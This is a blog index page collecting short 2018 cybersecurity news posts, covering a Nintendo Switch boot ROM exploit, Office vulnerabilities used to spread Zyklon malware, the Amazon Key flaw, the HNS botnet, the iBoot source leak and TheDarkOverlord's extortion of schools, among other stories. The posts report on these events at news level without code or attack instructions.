Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Piracy
Gaming Nintendo hacking Piracy

Hackers run Linux on Nintendo Switch

Last week, hacker group fail0verflow shared a photo on Twitter, showing that they had managed to run Linux on the Nintendo Switch.


This tweet followed after a previous one in January where they explained that their Switch coldboot exploit is a boot ROM bug, which as suggested in the name, is a piece of code containing instructions about the booting process stored in a read-only memory.

They also revealed that it is not possible to fix the flaw using patches in the current Switches.


Earlier, they had also tweeted a scroller for the Switch.

While they have teased the exploit to the public, it may be a while before fail0verflow publicly release the details and code for their hack, as evidenced by the PS4 exploit that they demonstrated in 2016 and only revealed the details of over a year later.

Meanwhile, the Switch hacking community continues to make progress. After the 34C3 conference which left the console’s security wide open, it seems that it’s going to be easier for hackers to create homebrew software for the Switch and even pirate games, which could mean serious financial repercussions for Nintendo.

For those with technical knowledge who prefer the white hat route, however, Nintendo is still offering bounties on reports of vulnerabilities.


Read more »

Axis Bank ATM in Kanpur dispenses fake Rs 500 note

An ATM belonging to Axis Bank in Kanpur district of Uttar Pradesh dispensed fake currency notes when two men attempted to withdraw money from it, news agency ANI reported.

When the men tried withdrawing Rs 10,000 and Rs 20,000 respectively, both of them got one fake note each with 'Children Bank of India' printed on it, instead of 'Reserve Bank of India'. The notes were purported to be of the denomination of Rs 500.

One of the persons who received a fake note from the ATM, Sachin, said that they complained to the ATM guard about the incident, who noted it down in his register.
Photo credit: ANI
“I came to withdraw Rs 10,000. One of the notes dispensed had ‘Children Bank’ printed on it. We complained to the ATM guard who noted it down in his register. We are being told that the action will be taken and our notes would be changed on Monday,” Sachin, a victim, was quoted as saying to news agency ANI.

As the police were informed, the faulty ATM, located at Marble Market, has been shut down and an investigation is underway.

“We came to know that two people had withdrawn Rs 20,000 and Rs 10,000 from the said ATM. They received 1 note each of Rs 500 with Children Bank printed on that. The ATM has been shut down. The investigation is underway,” SP South Kanpur said.

The incident was reminiscent of days just after demonetisation when many such instances came to light in different cities.
Read more »
Ransomware
Cyber Attacks. Machine learning. Cyber Security Ransomware

Advancing Ransomware Attacks and Creation of New Cyber Security Strategies

As ransomware is on the rise, the organisations are focusing too much on the anti-virus softwares rather than proactively forming strategies to deal with cyber-attacks which could pose as an indefinite threat to the users. Nevertheless one of the good advices to deal with this issue is the creation of the air-gaps, as through these it becomes quite easy to store and protect critical data. It even allows the offline storage of data. So, when a ransomware attack occurs, it should be possible to restore your data without much downtime – if any at all.

But it usually happens so that organisations more often than not find themselves taking one step forward and then one step back. As traditionally, the ransomware is more focused on backup programs and their associated storage but on the other hand it seems very keen on perpetually targeting the storage subsystems which has spurred organisations into having robust backup procedures in place to counter the attack if it gets through.

So in order for the organisations to be proactive it is recommended that they should resort to different ways to protecting data that allows it to be readily recovered whenever a ransomware attack, or some other cyber security issue, threatens to disrupt day-to-day business operations and activities.

Clive Longbottom, client services director at analyst firm Quocirca explains: “If your backup software can see the back-up, so can the ransomware. Therefore, it is a waste of time arguing about on-site v off-site – it comes down to how well air locked the source and target data locations are.”

However, to defend against any cyber-attack there needs to be several layers of defence which may or may not consist of a firewall, anti-virus software or backup. The last layer of defence that is to be used by the user though, must be the most robust of them all to stop any potential costly disruption in its track before it’s too late. So, anti-virus software must still play a key defensive role.

A ransomware attack is pretty brutal, warns Longbottom, “It requires a lot of CPU and disk activity. It should be possible for a system to pick up this type of activity and either block it completely, throttles it, or prevents it from accessing any storage system other than ones that are directly connected physically to the system.”

Now coming down to the traditional approach, it is often observed that data centres are in position in close proximity to each other in order to easily tackle the impact of latency, but for the fact they are all too often situated within the same circles of disruption increases the financial, operational and reputational risks associated with downtime.

Therefore there are a few certain tips that could allow the user to successfully migrate data to prevent ransomware attacks:
• The more layers you can add the better.
• User education.
• Update your Back-up regularly - it can be the last layer of defence.
• Have a copy off site – tape or cloud but don’t leave the drawbridge down.
• Planning of your backup process for your recovery requirement.

By following these one could successfully prevent cyber-attacks with ease and precision.
Read more »

Hackers hacked servers of Olympic organizers during opening ceremony


Olympic organizers servers were hacked during the opening ceremony on Feb. 9, as a result, their TVs at the main press center malfunctioned.

According to the South Korean news agency Yonhap News, the organizers briefly shut down their own servers which temporarily closed down the official website of the 2018 winter Olympic games.

Investigations are still in process, and not much is known about the individual or individuals behind the attack. However, we cannot decline that the Olympics are a prime target for hackers around the world.

In January only, cybersecurity firm McAfee published a report in which it disclosed that there are many existing campaigns which aim to target the  Olympic-affiliated organizations.

"With the upcoming Olympics, we expect to see an increase in cyber attacks using Olympics-related themes," the company explained in its report. "In similar past cases, the victims were targeted for their passwords and financial information. In this case, the adversary is targeting the organizations involved in the Winter Olympics by using several techniques to make it more tempting to open the weaponized document."

But cyber attacks on international events have become common.
Read more »

Recently patched Office vulnerabilities exploited

Criminals are delivering Zyklon malware using three vulnerabilities in Microsoft Office that were recently patched. Security researchers at FireEye reported that the malware campaign leveraging the relatively new Office exploits has been spotted in the wild, distributing an advanced malware that they called a full-featured backdoor.

The campaign exploits three recently disclosed vulnerabilities in Microsoft Office to execute a PowerShell script on the target system to eventually download the final payload. These vulnerabilities include:

CVE-2017-8759: works by tricking target into opening a specially crafted file.

CVE-2017-11882 (RCE vulnerability): 17-year-old memory corruption flaw patched in November that works when “upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object.”

Dynamic Data Exchange Protocol (DDE): “Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution,” researchers wrote. “With the help of a PowerShell script, the next payload is downloaded.
A Patched remote code execution Microsoft Office Vulnerability ( CVE-2017-11882) using it for spreading a variety of Malware such as FAREIT, Ursnif and a Keylogger Loki info stealer that is used for stealing Crypto wallet password.

In this case, some of the uncommon methods has been reused by helping of Windows Installer service Windows.

Previous Exploitation did use the Windows executable mshta.exe to run a Powershell script. but this attack using uses msiexec.exe Exploit this Vulnerability.

Various other methods such as Wscript, Powershell, Mshta.exe, Winword.exe is very common methods and security software are easily monitoring these methods if other malware is abusing these function.

Zyklon is a full-featured backdoor, first observed in the wild in early 2016, and offers a number of sophisticated capabilities to the attackers who primarily target telecommunications, insurance and financial services. The malware can do a number of things, including:

Keylogging

Password harvesting

Downloading and executing additional plugins

Conducting distributed denial-of-service (DDoS) attacks

Cryptocurrency mining

Self-updating and self-removal
Read more »
Security flaw
Amazon Key raspberry pi hack Security flaw

Amazon denies risk in Amazon Key — while it is working to fix it

Earlier this week, Anonymous researcher and Twitter user, MG, posted a video showing how Amazon Key, the company’s recently launched service which allows delivery staff to unlock a customer’s house and deposit items when no one’s home, can be used to disable customer’s alarm systems and break into their homes using a software.


After a failed attempt at disclosure with Amazon, where it demanded to see a PoC and refused the possibility of any reward or payment, MG took to Twitter and uploaded the video showing how Amazon Key can be exploited by “anyone with a raspberry pie.”

Once the video was posted, Amazon finally reached out to him and is currently working on a fix to the vulnerability.

However, Amazon is still denying any risk associated with its product.

"The security features built into the delivery application technology used for in-home delivery are not being used in the demonstration,” said Kristen Kish, Amazon spokesperson.

She added that, “Safeguards are in place when the driver technology is used: our system monitors 1) that the door is only open for a brief period of time, 2) communication to the camera and lock is not interrupted, and 3) that the door is securely re-locked. The driver does not leave without physically checking that the door is locked. Safety and security is built into every aspect of the service.”

While MG is withholding technical details until Amazon has a chance to fix the issue, the video shows how a hacker can easily enter a house enabled with Amazon Key.

Amazon also told Forbes that the hack involves “disrupting Wi-Fi connections used by the Key system, not Amazon software. The Raspberry Pi does some as yet undisclosed deauthorization, which would indicate a disconnection between the various pieces of the Amazon Key setup.”

MG, in his report, questions this process.

“Why are you using low wage workers to be the last gate in a bad security model? How often has this process been audited for completion rates or holes?” he writes.

He is also concerned about the “fact that they require your house’s alarm to be turned off for a driver to use the Amazon Key without issue,” saying that Amazon doesn’t talk about the consumer use of the app either.
Read more »

'Hide and Seek'' botnet attack could hit India

A malicious cyber threat "Hide and Seek"(NHS) is looming over India after it had affected major countries across the globe.

A Romanian cybersecurity and anti-virus software company, Bitdefender has said that a cyber threat in the shape of HNS botnet can hit the country very hard and it would affect millions of the users.

"A malicious cyber threat in the shape of HNS botnet now hovers above the ginormous cyber network of India. While the world still healing from the scars of ransomware cyber-attack, we cannot afford to conjure any other of such attack with such tiny or no information -- additionally more threatening and effective," Zakir Hussain, Director, BD soft, Bitdefender, told IANS.

Globally the botnet controls more than 32,312 Internet of Things (IoT) devices, and it seems that they have undergone massive development.

"This menace being hardly traceable, can hit India a severe blow. Though the latest technology adopted by the governmental departments of India is sophisticated and safeguarded, 'prevention is always better than cure'," Hussain added.

"When the world is still in a rivalry to 'Hide and Seek', India can be one of the countries on the list and must be prepared," he added.

On January 10, security researchers at Bitdefender Labs spotted an emerging botnet that uses custom-built peer-to-peer communication to exploit victims.

"The HNS botnet communicates in a complex and decentralized manner and uses multiple anti-tampering techniques to prevent a third party from hijacking/poisoning it. The bot can perform web exploitation against a series of devices," Bitdefender researchers wrote in a blog post.

Once the botnet infects the devices, hackers can use commands to control it.


hackers behind the botnet can use commands to control it.
Read more »

Series charge: Google facing fine in India

Even before it faced fine by the European Commission, Google felt the heat of a set of complaints for misconducting its dominance in India forcing the search engine to pay fine at the instance of a regulatory body.

The complaints of misconducting its dominance in the country against the global tech titan were five year old which left the rivals in dire straits forcing the Competition Commission of India to levy the fine.

Initially, in 2012 Bharat Matrimony leveled an accusing finger against the search engine to be followed by a consumer protection group with the allegations of the same nature.

Later, the Competition Commission of India confirmed the complaints and asked the tech giant to pay fine for abusing the dominance.

CCI observed that the biased search operation by Google put its rival business in high and dry forcing the largest search engine to examine the complaints along with the CCI concern.

After a thorough probe, CCI confirmed the authenticity of the 5 year old complaints against the search engine and asked it to pay fine.

Google, however, said it has been devising new mechanism to live up to the users' expectations.

Now the search engine is not in a position to escape the fine to the tune of 5%of what it earns a year in the country, which does not a matter for the tech titan.

Notably, Google had to pay a huge $2.7bn; £2.1bn to the European Commission last year for allegedly promoting its own shopping services.
Read more »

How source code leak put Apple in trouble

What makes hackers easy to strike in iOS and iPhones? Consider the case of how key iPhone source code found posted in GitHub.

Cyber experts maintain that iBoot, the GitHub source code acts as the boot of the entire operating mechanism allowing the iPhone to run as soon as it is switched on. It functions like the BIOS of an iPhone to check if it is allowed to execute by Apple.

The entire story here deals with a huge leak of iBoot source code where the most crucial iOS programme found place in a GitHub post. Initially, Apple was averse to put the code in public domain. But after months of will-it-wont it, the software titan a few selected parts of iOS and MacOs have been opened up. In the same breath, Apple took up a slew of measures to ensure safety and privacy of iBoot.

There was flutter in Apple when the iBoot source code was found anonymously posted GitHub. Cyber researchers call the code a real one for iBoot where the huge leak remains still clueless. Initially Apple maintained studied silence. But virtually admitted it as it took resort to a copy right notice and slammed a legal notice to GitHub asking it to drop the code in question. GitHub did it accordingly.

According to another cyber security expert with this access with the iBoot code, they got to know the vulnerabilities and the hackers found it easy to crack the entire system with the flaws in the iPhone.

The iBoot, earlier was easy to allow an access for the hackers to lock the screen and decrypt the data which has forced the new ones to be with a chip to ensure safety and security of the iPhone.

The advanced mechanism has made it difficult for the hackers to come up to the market with iOS devices which puts even many cyber security researches clueless.

These schemes of things, these days, have made it difficult for the hackers to unearth the bugs in iOS.


Read more »

Consumers Report: Smart TV's Vulnerable to Hacking

Millions of smart TVs and other streaming devices could be easily exploited by cybercriminals as they have several security vulnerabilities.

In an extensive investigation survey done by the Consumer Reports, a non-profit organization which publishes a magazine and a website,  found out that the security of connected viewing devices and user privacy policies of top manufacturers were not up to the mark.

Consumer Reports analyzed smart TVs from five big U.S. TV brands — Samsung, LG, Sony, TCL and Vizio — and found several problems.

Samsung’s smart TVs and Roku’s smart-TV platform are the ones that have badly hit by the security flaws which allows hackers to change the channel, raise the volume, or (worst of all) play random YouTube videos.

"We found that a relatively unsophisticated hacker could change channels, play offensive content, or crank up the volume, which might be deeply unsettling to someone who didn’t understand what was happening," Glenn Derene, Consumer Reports' senior director of content.

However, Roku hit back hard in a blog post entitled “Consumer Reports Got it Wrong“. They have assured their customers that there is no security risk.

"Roku enables third-party developers to create remote control applications that consumers can use to control their Roku products. This is achieved through the use of an open interface that Roku designed and published. There is no security risk to our customers’ accounts or the Roku platform with the use of this API. In addition, consumers can turn off this feature on their Roku player or Roku TV by going to Settings>System>Advanced System Settings>External Control>Disabled," said Gary Ellison,  Roku's vice president.

Meanwhile, a Samsung's spokesperson told Consumer Reports that they are investigating the problem and would be able to release an updated software this year that would presumably fix other related errors.







Read more »
school breach
Cyber Crime cyber threat Data Breach FBI school breach

Hacker Group threatens students and schools

According to a warning issued by the Cyber Division of the FBI and the Department of Education's Office of the Inspector General on 31 January, a hacker group called “TheDarkOverlord” (TDO) has tried to sell over 100 million private records and as for January, is responsible for over 69 attacks on schools and other businesses.

TDO is also allegedly responsible for the release of over 200,000 records including the PII of over 7,000 students due to nonpayment of ransoms.

The warning describes the group as “a loosely affiliated group of highly trained hackers” who, since April 2016, have “conducted various extortion schemes with a recent focus on the public school system.”

The warning says that TDO uses remote access tools to breach school district networks and steal sensitive data, which they then use to extort money from its victims, including students.

According to the report, TDO has also threatened violence in case of failure to meet demands.

Initially, TDO communicated their demands via email with threats of publicly releasing stolen data, but the warning notes that in September 2017, “TDO escalated its tactics by threatening school shootings through text messages and emails directed at students, staff, and local law enforcement officials.”

This caused several schools to shut down for few days as a precaution.

TDO was allegedly connected to multiple threats of violence on school campuses, however, the report says that while these threats caused panic, they “provided TDO with no apparent monetary gain.”

In a recent incident, TDO threatened to publicize the sensitive behavioral reports and private health information of students.

The FBI also recommends that victims do not give in to the ransom demands, as it does not guarantee regaining access to sensitive data. Rather, they advice to contact law enforcement, retain the original emails as evidence, and maintain a timeline of the attack, if possible.
Read more »
Subscribe to: Comments (Atom)